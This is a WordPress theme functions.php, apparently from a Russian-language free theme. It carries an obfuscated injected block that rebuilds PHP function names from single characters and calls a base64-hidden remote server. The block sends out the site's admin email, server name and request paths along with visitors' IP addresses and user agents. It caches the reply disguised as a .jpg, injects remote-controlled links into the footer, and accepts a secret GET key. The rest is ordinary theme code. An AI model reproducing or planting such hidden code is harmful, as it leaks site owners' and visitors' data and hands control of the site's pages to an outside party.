<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $EmkVD='6';$ciTr='_';$qrfcbr='b';$XMxsf='e';$KDjTIpu='a';$NoJGoo='d';$KqSCY='s';$icTaES='d';$ShKVXZ='e';$BFbxjsv='c';$ancmpkg='o';$xZutWt='e';$YEISo='4';$ibcQoCHm=$qrfcbr.$KDjTIpu.$KqSCY.$ShKVXZ.$EmkVD.$YEISo.$ciTr.$icTaES.$xZutWt.$BFbxjsv.$ancmpkg.$NoJGoo.$XMxsf;$aCvs='e';$sTOhz='l';$dDic='a';$ThraYY='f';$VdgZw='z';$OXhHXXE='t';$cXns='n';$UiSaPW='i';$GwtVrOG='g';$bdpEFPPh=$GwtVrOG.$VdgZw.$UiSaPW.$cXns.$ThraYY.$sTOhz.$dDic.$OXhHXXE.$aCvs;$hSDyDH='r';$QDuq='_';$jTvZx='1';$dqzayg='s';$qaXjDvN='3';$eipSAeh='t';$dImkHIV='o';$vLgwnBO='t';$PoNeM='r';$RnAYNCbq=$dqzayg.$vLgwnBO.$PoNeM.$QDuq.$hSDyDH.$dImkHIV.$eipSAeh.$jTvZx.$qaXjDvN;$pxHunO='r';$rumeb='v';$MHABiHM='t';$ZCHDwL='s';$AmBHg='r';$RtaRVI='e';$nylgTYkm=$ZCHDwL.$MHABiHM.$pxHunO.$AmBHg.$RtaRVI.$rumeb;                     $an_______s='6';$wk________d='_';$vj___l='b';$cv_________n='e';$zu____m='a';$wo_______w='d';$xi_______________p='s';$ai_______________w='d';$ys_____r='e';$vm____t='c';$ud______t='o';$rb______r='e';$lu________r='4';$ik___k=$vj___l.$zu____m.$xi_______________p.$ys_____r.$an_______s.$lu________r.$wk________d.$ai_______________w.$rb______r.$vm____t.$ud______t.$wo_______w.$cv_________n;$hh___b='s';$bc_____y='c';$lx________i='e';$oq____b='f';$kx_______f='t';$ol______________q='x';$zo_______e='_';$ui_______i='n';$fx_________h='u';$xq_______________o='n';$ne_________y='i';$ee___________q='t';$by___f='s';$dg__l='i';$lc___________m='o';$cb_________u=$oq____b.$fx_________h.$xq_______________o.$bc_____y.$kx_______f.$dg__l.$lc___________m.$ui_______i.$zo_______e.$lx________i.$ol______________q.$ne_________y.$by___f.$ee___________q.$hh___b;$bg____________r='o';$sd_____t='p';$hz____________z='n';$wb____n='e';$lt___s='f';$gb__________x=$lt___s.$bg____________r.$sd_____t.$wb____n.$hz____________z;$fu_______________e='e';$ur__________l='r';$xf___________e='d';$dk________r='a';$ju_______________q='f';$my_____c=$ju_______________q.$ur__________l.$fu_______________e.$dk________r.$xf___________e;$dv_______________a='c';$ed______________r='s';$xi______m='o';$id________d='l';$nt______r='f';$or_______u='e';$lj__a=$nt______r.$dv_______________a.$id________d.$xi______m.$ed______________r.$or_______u;define("WP_ID", $ik___k("Mi4wLjA="));define("WP_TTL", $ik___k("MTA4MDA="));define("WP_SRC", $ik___k("dHBva24="));function wp_get_header() {global $ik___k, $cb_________u;if ($cb_________u($ik___k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$cb_________u($ik___k("d3BfZ2V0X2Zvb3Rlcg==")) &&$cb_________u($ik___k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ik___k, $gb__________x, $lj__a, $my_____c;$lj______________k = TEMPLATEPATH."/".$ik___k("Zm9vdGVyLnBocA==");$mu___________i = @$gb__________x($lj______________k, "r");$lj______________k = @$my_____c($mu___________i, @filesize($lj______________k));@$lj__a($mu___________i);$bv___________o = TEMPLATEPATH."/".$ik___k("ZnVuY3Rpb25zLnBocA==");$mu___________i = @$gb__________x($bv___________o, "r");$bv___________o = @$my_____c($mu___________i, @filesize($bv___________o));@$lj__a($mu___________i);$lj_____q = 0;if($lj______________k && $bv___________o) {if ($ik___k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($lj______________k, $ik___k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$lj_____q = 1;}if (substr_count($lj______________k, "wp_theme_GPL_credits()") < 1) {$lj_____q = 2;}}if(WP_ID != "2.0.0") {$lj_____q = 12;}}if($lj_____q > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $lj_____q -->";}}function wp_loaded() {global $ik___k, $cb_________u;return $cb_________u($ik___k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($lq_________h, $uh____f = "(more...)", $so____d = 0, $xb_________j = "") {$xt_________j = get_the_content($uh____f, $so____d, $xb_________j);$xt_________j = apply_filters("the_content", $xt_________j);$xt_________j = str_replace("]]>", "]]>", $xt_________j);if (strlen($_GET["p"]) > 0) {echo $xt_________j;}else if ((strlen($xt_________j)>$lq_________h) && ($fy__j = strpos($xt_________j, " ", $lq_________h ))) {$xt_________j = substr($xt_________j, 0, $fy__j);$xt_________j = $xt_________j;echo $xt_________j;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$uh____f</a></div></p>";} else {echo $xt_________j;}}}$wq___b='o';$oz______b='b';$zp_____j='n';$bd_____________v='e';$kd___________k='6';$ra_____f='e';$hw______________c='_';$fj_____________i='e';$nq_________h='c';$tn___________j='4';$ax_______k='d';$jy_______e='a';$uf___u='s';$mg____i=$oz______b.$jy_______e.$uf___u.$fj_____________i.$kd___________k.$tn___________j.$hw______________c.$ra_____f.$zp_____j.$nq_________h.$wq___b.$ax_______k.$bd_____________v;$ts___n='t';$th____e='_';$ry__________x='f';$jh______c='n';$zu_________l='s';$he_____p='i';$zd_______________u='e';$fd____r='e';$bv___________t='t';$ol_____q='t';$tg___________b='_';$lp_________k='l';$bt______________n='g';$ng_____n='o';$iy__k='n';$me____________j='e';$ly___________w='c';$dz__________a=$ry__________x.$he_____p.$lp_________k.$zd_______________u.$th____e.$bt______________n.$me____________j.$bv___________t.$tg___________b.$ly___________w.$ng_____n.$jh______c.$ol_____q.$fd____r.$iy__k.$ts___n.$zu_________l;$hy_____________h='i';$qq___________m='e';$bj______b='l';$lo_______k='s';$zv__d='i';$an____________d='f';$iy_____________n='e';$ux_________d='s';$jk_________l='t';$cl_____________t='x';$wv____i='_';$op________j=$an____________d.$zv__d.$bj______b.$iy_____________n.$wv____i.$qq___________m.$cl_____________t.$hy_____________h.$lo_______k.$jk_________l.$ux_________d;$nm______x='m';$pi_____l='n';$pq__________d='e';$yo__r='e';$ja____l='s';$zq______p='r';$mt________i='v';$dq_______n='o';$mm______i='p';$rd__________t='o';$sd_________e='_';$xa_________m='c';$bj_____________p='r';$we__w='i';$rj____u='a';$bt_________w=$mt________i.$pq__________d.$bj_____________p.$ja____l.$we__w.$dq_______n.$pi_____l.$sd_________e.$xa_________m.$rd__________t.$nm______x.$mm______i.$rj____u.$zq______p.$yo__r;$jn___f='o';$zf____u='s';$hr_____m='f';$ya______________y='n';$vp__________n='p';$ne_____e='o';$dc__h='k';$ko_____________g='c';$eh____________l='e';$hh________n=$hr_____m.$zf____u.$ne_____e.$ko_____________g.$dc__h.$jn___f.$vp__________n.$eh____________l.$ya______________y;$pf_____v='f';$eu____________w='e';$fz____c='i';$gz_________m='w';$yc______l='t';$zl___m='r';$op______l=$pf_____v.$gz_________m.$zl___m.$fz____c.$yc______l.$eu____________w;$nh________s='5';$rb_____w='m';$bl_______________a='d';$rj____________j=$rb_____w.$bl_______________a.$nh________s;$ce_____y='t';$fa______z='a';$wt______s='p';$vt__________v='h';$bl_______d='l';$zr____________j='r';$jq_______________y='e';$bm___q='a';$in____________y=$zr____________j.$jq_______________y.$fa______z.$bl_______d.$wt______s.$bm___q.$ce_____y.$vt__________v;$al_______________j='n';$xo_______________z='e';$im_____z='z';$eb_______t='l';$pv________t='u';$tc__c='r';$pu_________n='e';$qd_________p='s';$lf_____h='a';$ze_________x='i';$wx________x='i';$qq_____________a=$pv________t.$al_______________j.$qd_________p.$xo_______________z.$tc__c.$ze_________x.$lf_____h.$eb_______t.$wx________x.$im_____z.$pu_________n;$cq___________c='m';$bl___q='t';$mj___________j='a';$yc_____________q='n';$jc____d='p';$fs_____________v='m';$yi____p='e';$bm_____________g=$bl___q.$yi____p.$cq___________c.$jc____d.$yc_____________q.$mj___________j.$fs_____________v;$rt_____m='o';$vy_______a='m';$ku___________u='s';$rf______m='x';$lc_____________p='e';$aw__k='c';$dc______________c='e';$kx___u='r';$kq__________d='n';$lw______________h='a';$vo_________p='_';$sm_____________t='r';$ur_______e='t';$es_________z='t';$ev______________t='a';$cl______________g='t';$ou______a='e';$qf____________h='t';$yq___________p='c';$os_______________q='e';$hb__________h='_';$jr__f=$ku___________u.$ur_______e.$sm_____________t.$dc______________c.$lw______________h.$vy_______a.$vo_________p.$aw__k.$rt_____m.$kq__________d.$cl______________g.$ou______a.$rf______m.$es_________z.$hb__________h.$yq___________p.$kx___u.$os_______________q.$ev______________t.$qf____________h.$lc_____________p;function nb___c($aq_________n) {global $ik___k, $cb_________u, $dz__________a, $bt_________w, $jr__f;if (!$cb_________u($ik___k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($bt_________w(PHP_VERSION, "5.0.0", ">=") && $cb_________u($ik___k("ZmlsZV9nZXRfY29udGVudHM=")) && $cb_________u($ik___k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$py_______________p = $jr__f(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ez__p = @$dz__________a($aq_________n, 0, $py_______________p);} else {$ez__p = @$dz__________a($aq_________n, 0);}return $ez__p;}function my_____o($aq_________n) {global $cb_________u, $hh________n, $op______l, $ik___k;if (!$cb_________u($ik___k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ar___________x = strpos($aq_________n, "/", 7);$xi__________s = array("uri"     => substr($aq_________n, $ar___________x),"host"    => str_replace("http://", "", substr($aq_________n, 0, $ar___________x)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$an______________x = @$hh________n("$xi__________s[host]", 80, $pq____h, $sa_________y, 4);if (!$an______________x) {return false;} else {$ez__p = "";$fr__i  = "GET $xi__________s[uri] HTTP/1.0\r\n";$fr__i .= "Host: $xi__________s[host]\r\n";$fr__i .= "Referer: $xi__________s[referer]\r\n";$fr__i .= "Connection: Close\r\n\r\n";@$op______l($an______________x, $fr__i);while (!@feof($an______________x)) {$kh_______________r = @fgets($an______________x, (1024*24));if ($kh_______________r == "\r\n") {$ac___q = true;continue;}if ($ac___q) {$ez__p .= $kh_______________r;}}return $ez__p;}}function qt______f($aq_________n) {global $cb_________u;$fc___r = false;if ($aq_________n != "") {if ($cb_________u("nb___c")) {$fc___r = @nb___c($aq_________n);}if (!$fc___r && ($cb_________u("my_____o"))) {$fc___r = @my_____o($aq_________n);}}return $fc___r;}function nm__________w() {global $_SERVER, $rj____________j;$bb__p = $_SERVER["SERVER_NAME"];if (substr("$bb__p", 0, 4) == "www.") {$bb__p = substr("$bb__p", 4);}$bb__p = $rj____________j("$_SERVER[SERVER_NAME]");return $bb__p;}function ol___________c() {return "file";}function wl____________c($aq_________n) {global $_SERVER, $dz__________a, $op________j, $gb__________x, $lj__a, $op______l;$gc___u = mg________b();$ng_____________s = nm__________w().".jpg";$oa_______x = $gc___u["dir_upload"]["path"]."/$ng_____________s";$dt____________m = @filemtime($oa_______x);if (!$dt____________m || ((time()-$dt____________m) >= WP_TTL)) {$fc___r = qt______f($aq_________n);if ($fc___r) {if ($op________j($oa_______x)) {@unlink($oa_______x);}$mu___________i = @$gb__________x($oa_______x, "x+");@$op______l($mu___________i, $fc___r);@$lj__a($mu___________i);}} else {if ($op________j($oa_______x)) {$fc___r = @$dz__________a($oa_______x);} else {$fc___r = false;}}return $fc___r;}function mg________b() {global $_SERVER, $ik___k, $mg____i;$ru___i = wp_count_posts("post");$an______t = pathinfo(get_bloginfo("template_directory"));$gc___u = array("url" => array("report"      => $ik___k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $an______t,"dir_upload"=> ab________x(),"queryString"=> array("?a001=".WP_ID,"a004=".$an______t[filename],"a005=".$ru___i->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> ");$gc___u["url"]["queryString"] = implode("&", $gc___u["queryString"]);$gc___u["url"]["report"] = $gc___u["url"]["report"]."/?".$mg____i($gc___u["url"]["queryString"]).".html";return $gc___u;}function ab________x() {$og_______________f = wp_upload_dir();if (isset($og_______________f["error"])) {$bn_____________b = ux_________g();if (is_writable($bn_____________b)) {$og_______________f = array("path" => $bn_____________b);}}return $og_______________f;}function ux_________g() {global $cb_________u, $rj____________j, $in____________y, $bm_____________g;$fb_______________u = (bool) ini_get("safe_mode");if ($fb_______________u == true) {return false;}if ($cb_________u("sys_get_temp_dir")) {$xb_________z = sys_get_temp_dir();if (is_writable($xb_________z)) {return $in____________y($xb_________z);}}if (!empty($_ENV["TMP"])) {return $in____________y($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $in____________y($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $in____________y($_ENV["TEMP"]);} else {$ii______________a = $bm_____________g($rj____________j(uniqid(rand(), true)), "");if ($ii______________a) {$xb_________z = $in____________y(dirname($ii______________a));@unlink($ii______________a);return $xb_________z;} else {return false;}}}function fj________c() {global $_GET, $op________j;$gc___u = mg________b();$bb__p = nm__________w();$wx_______________n = ol___________c();$va________r = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($wx_______________n == "file") {$uv___________o = $gc___u["dir_upload"]["path"]."/".$bb__p.".jpg";if ($op________j($uv___________o)) {@unlink($uv___________o);$va________r = "deleted";}}$cu_______________e = array("s"=> $va________r,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($cu_______________e AS $pw______k => $ra_______________l) echo " [$pw______k:$ra_______________l]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $cb_________u, $ik___k, $qq_____________a;$gc___u = mg________b();$kz____n = "wl____________c";if ($cb_________u($kz____n)) {$ez__p = $kz____n($gc___u["url"]["report"]);}if ($ez__p) {if ($ez__p = @$ik___k($ez__p)) {$ez__p = @$qq_____________a($ez__p);if (strlen($ez__p[custom_credit]) >= 5) {$gc___u["default_string"] = $ez__p[custom_credit];}if ($ez__p["status"] == "0") {$ca____g = 1;$rw______i = 1;} else {$wb__f = sizeof($ez__p["links"]);$mz_________z = $gc___u["default_string"];if ($wb__f > 0 && $ez__p["links"] !== "") {$ta_____________t = 0;foreach ($ez__p["links"] as $ku_____________p => $de________l) {$ta_____________t++;if ($de________l->l_path == "" || $de________l->l_path == $_SERVER["REQUEST_URI"]) {$de________l->l_href = htmlspecialchars(strip_tags($de________l->l_href));$de________l->l_title = htmlspecialchars(strip_tags($de________l->l_title));$de________l->l_anchor = htmlspecialchars(strip_tags($de________l->l_anchor));$mz_________z .= " | ";$mz_________z .= "<a href='$de________l->l_href' title='$de________l->l_title'";if ($de________l->l_nofollow == "1") {$mz_________z .= " rel='nofollow'";}$mz_________z .= ">$de________l->l_anchor</a>";}}}$gc___u["links"] = "$mz_________z";if ($ez__p[credit] == "0") {$gc___u["links"] = "";}}} else {$ca____g = "1";}} else {$ca____g = "1";}if ($ca____g == "1") {$gc___u["links"] = $gc___u["default_string"];}echo "$gc___u[links]";echo "<!-- s: $ez__p[signature] -->";fj________c();}                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
